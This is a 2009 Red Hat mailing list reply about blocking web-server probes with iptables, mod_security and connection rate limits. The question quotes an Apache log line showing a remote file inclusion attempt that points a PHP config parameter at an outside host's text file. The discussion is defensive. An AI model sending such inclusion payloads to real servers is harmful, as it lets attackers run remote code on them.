2009/7/8 ESGLinux <esggrupos@xxxxxxxxx>: > Hi all, > I´m having a problem with an Apache web server. > > I get a lot of access ot this kind: > > > x.x.x.x - - [08/Jul/2009:09:42:20 +0200] "GET > //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://aboutav.com//id1.txt??? > HTTP/1.1" 404 1015 "-" "Mozilla/5.0" > > where x.x.x.x is the ip of the client, I suposse this ip is trying to find a > security hole in my system, so what I do manually is this: With Apache, a very useful tool to block this events is mod_security. > > iptables -A INPUT -s x.x.x.x -p tcp -m tcp --dport 80 -j DROP > > I want to do this automatically. I´m thinking to use logwatch but I´m not > sure how to do it. (I´m testing but for the moment I haven´t found the > solution) > > anybody knows another way to do what I want? > > By the way, I´m interesting to limit the connections to my webserver using > iptables with limit module and busrt argument. What do you think about it? > is a good solution or I´m on the wrong way? Do you know how to prevent DOS > attacks? You can do this with iptables, but always take in mind the corporate proxys and gateways. A gubernamental proxy by example, can do a lot of legitime connections. Hope this helps. -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
